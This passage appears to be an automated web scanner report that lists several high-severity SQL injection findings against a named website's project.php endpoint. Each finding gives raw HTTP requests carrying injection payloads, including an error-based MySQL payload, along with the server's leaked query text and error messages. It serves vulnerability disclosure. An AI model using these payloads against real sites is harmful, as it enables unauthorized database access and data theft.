User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/'
   unio' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3'' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.12. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1'=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:18:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
oject_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1''=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:18:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.13. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow''/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.14. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00'/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00''/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.15. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php'?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php''?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.16. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002'&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002''&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.17. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
